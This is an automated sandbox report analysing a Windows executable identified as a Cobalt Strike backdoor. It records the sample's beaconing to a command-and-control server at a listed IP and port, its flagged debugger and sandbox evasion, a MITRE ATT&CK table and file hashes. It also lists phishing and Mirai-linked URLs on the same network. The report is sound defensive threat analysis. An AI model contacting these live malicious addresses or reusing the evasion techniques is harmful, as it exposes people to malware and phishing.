Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49940

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AB01A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_03AB01A8

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03A9FA1C		0_2_03A9FA1C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA5854		0_2_03AA5854

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Window / User API: threadDelayed 9694

Jump to behavior

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA5854

0_2_03AA5854

Source: C:\Users\user\Desktop\2HSalvXIJE.exe TID: 7556	Thread sleep count: 9694 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe TID: 7556	Thread sleep time: -96940000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe TID: 7604	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe TID: 7556	Thread sleep count: 46 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2HSalvXIJE.exe TID: 7556	Thread sleep time: -460000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_03AA9220
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_03AA1C30

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000016D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000012D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000012E000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000016D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000016D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000016D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000012D000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000012D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_0-34237

Found potential dummy code loops (likely to delay analysis)

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Process Stats: CPU usage > 42% for more than 60s

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AB8B30 IsDebuggerPresent,__crtUnhandledException,

0_2_03AB8B30

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AB9744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_03AB9744

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AC0198 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW,

0_2_03AC0198

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AC03C8 VirtualQuery,GetModuleFileNameW,GetPdbDllFromInstallPath,GetProcAddress,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,

0_2_03AC03C8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	0_2_00401180
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00402F69 SetUnhandledExceptionFilter,	0_2_00402F69
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_00401A70
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_004092E4 SetUnhandledExceptionFilter,	0_2_004092E4
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC24F0 SetUnhandledExceptionFilter,	0_2_03AC24F0
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AC24D8 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,	0_2_03AC24D8
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AB44D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_03AB44D0

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AADF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,

0_2_03AADF50

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AC2050 AllocateAndInitializeSid,

0_2_03AC2050

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

0_2_00401630

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00401990

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_03AA5E28

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03AA5E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,

0_2_03AA5E28

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: Process Memory Space: 2HSalvXIJE.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2HSalvXIJE.exe.3a90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2HSalvXIJE.exe.3a90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Metasploit Payload

Source: Yara match

File source: 00000000.00000002.3883321381.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA6A78 socket,htons,ioctlsocket,closesocket,bind,listen,	0_2_03AA6A78
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AAEE8C socket,closesocket,htons,bind,listen,	0_2_03AAEE8C
Source: C:\Users\user\Desktop\2HSalvXIJE.exe	Code function: 0_2_03AA6670 htonl,htons,socket,closesocket,bind,ioctlsocket,	0_2_03AA6670

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	2 Valid Accounts	2 Valid Accounts	2 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	21 Access Token Manipulation	212 Virtualization/Sandbox Evasion	LSASS Memory	341 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Process Injection	21 Access Token Manipulation	Security Account Manager	212 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	111 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	3 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
2HSalvXIJE.exe	87%	ReversingLabs	Win64.Backdoor.CobaltStrike
2HSalvXIJE.exe	100%	Avira	HEUR/AGEN.1345031
2HSalvXIJE.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Reputation
http://79.124.58.130/aiHK	true	unknown
79.124.58.130	true	unknown
http://79.124.58.130:7698/en_US/all.js	true	unknown
http://79.124.58.130:7698/aiHK	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://79.124.58.130:7698/en_US/all.jsq	2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsu	2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsw	2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsy	2HSalvXIJE.exe, 00000000.00000003.2237319191.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.js8	2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/aiHK4fI	2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.js?	2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/aiHKn5#	2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsa	2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsd	2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1834415462.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1886596298.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1844457425.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1866017243.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1855794849.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1876218840.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsg	2HSalvXIJE.exe, 00000000.00000003.1824484063.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1814491351.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1804094560.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1793433223.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsra	2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsh	2HSalvXIJE.exe, 00000000.00000003.1759970628.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1772648615.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1793433223.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsk	2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1804094560.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsm	2HSalvXIJE.exe, 00000000.00000002.3883339125.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3154798813.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsn	2HSalvXIJE.exe, 00000000.00000003.2064909405.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.2237319191.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1759970628.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1739835417.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1783330278.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.2064841546.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1772648615.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1749859098.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsdows	2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/aiHKl	2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jssi	2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsE	2HSalvXIJE.exe, 00000000.00000003.3462268517.000000000014B000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.3767282345.000000000014B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/en_US/all.jsF	2HSalvXIJE.exe, 00000000.00000003.1917242500.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1886596298.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1927527147.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1906875201.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1896860921.0000000000189000.00000004.00000020.00020000.00000000.sdmp, 2HSalvXIJE.exe, 00000000.00000003.1876218840.0000000000189000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://127.0.0.1:%u/	2HSalvXIJE.exe, 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp	false	unknown
http://79.124.58.130:7698/aiHK-369	2HSalvXIJE.exe, 00000000.00000002.3883339125.00000000000FC000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.124.58.130	unknown	Bulgaria		50360	TAMATIYA-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1540350
Start date and time:	2024-10-23 17:24:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2HSalvXIJE.exe renamed because original name is a hash value
Original Sample Name:	4B3D1C48C04C6187BA4FF2B1A55AB27D.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/0@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 17 Number of non-executed functions: 145
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 2HSalvXIJE.exe

Simulations

Behavior and APIs

Time	Type	Description
11:25:33	API Interceptor	13205642x Sleep call for process: 2HSalvXIJE.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TAMATIYA-ASBG	https://bastionesan.gay/teleforser51/	Get hash	malicious	Unknown	Browse	79.124.49.200
	http://condenast-hub-okta-emea-7d5ea512.aibels.com/	Get hash	malicious	Unknown	Browse	78.128.114.103
	https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://gwf.ebay.com&af_web_dp=http%3A%2F%2Fdsena3.web.app%2FlH05rnad0TrainQ3b07xgwfd0TR3wH05nZ1d0Tau	Get hash	malicious	HTMLPhisher	Browse	78.128.114.103
	https://click.snapchat.com/aVHG?pid=snapchat_download_page&af_dp=http://davidson-tech.ebay.com&af_web_dp=http%3A%2F%2Fdsena3.web.app%2FjH05hnhH05lly07xdavid5kZH05n-tQ3bR3whd0TR3wH05nZ1	Get hash	malicious	HTMLPhisher	Browse	78.128.114.103
	hmsLm3zv4e	Get hash	malicious	Mirai	Browse	78.128.114.66
	WDPKg5l9gb	Get hash	malicious	Mirai	Browse	78.128.114.66
	x86	Get hash	malicious	Mirai	Browse	78.128.114.66
	TaTYytHaBk.exe	Get hash	malicious	Unknown	Browse	87.121.98.43

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.229948887716625
TrID:	Win64 Executable (generic) (12005/4) 74.80% Generic Win/DOS Executable (2004/3) 12.49% DOS Executable Generic (2002/1) 12.47% VXD Driver (31/22) 0.19% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	2HSalvXIJE.exe
File size:	19'456 bytes
MD5:	4b3d1c48c04c6187ba4ff2b1a55ab27d
SHA1:	482dcc7ebafc84b260d3a8cfbc651caed407515a
SHA256:	08304b4914cf147f9422b7a887b04302cf54d74da74a03510ac6f617f7c39139
SHA512:	781c4038a0573e3457b7d0c58c3cfc192d3c642bf8ff75f6694fd5ab94abb6c52c49a71caea38603dc12bc439a82260f9241d8b43e5b4c6b3cd87e2666eb31c2
SSDEEP:	192:NV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2qbmG3V97WF8qa1Dojjgi:/qaCF31cix+Dc4zjvqZFF46gi
TLSH:	3492E93FE71368E9C116D57845FB3732DCB23DB385A6A32E1734D2B42E102A46E6E610
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@.....................................\......... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014c0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:	0x401ba0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	147442e63270e287ed57d33257638324

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00003FF5h]
mov dword ptr [eax], 00000001h
call 00007F1F98E0549Fh
call 00007F1F98E04C8Ah
nop
nop
dec eax
add esp, 28h
ret
nop word ptr [eax+eax+00000000h]
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00003FC5h]
mov dword ptr [eax], 00000000h
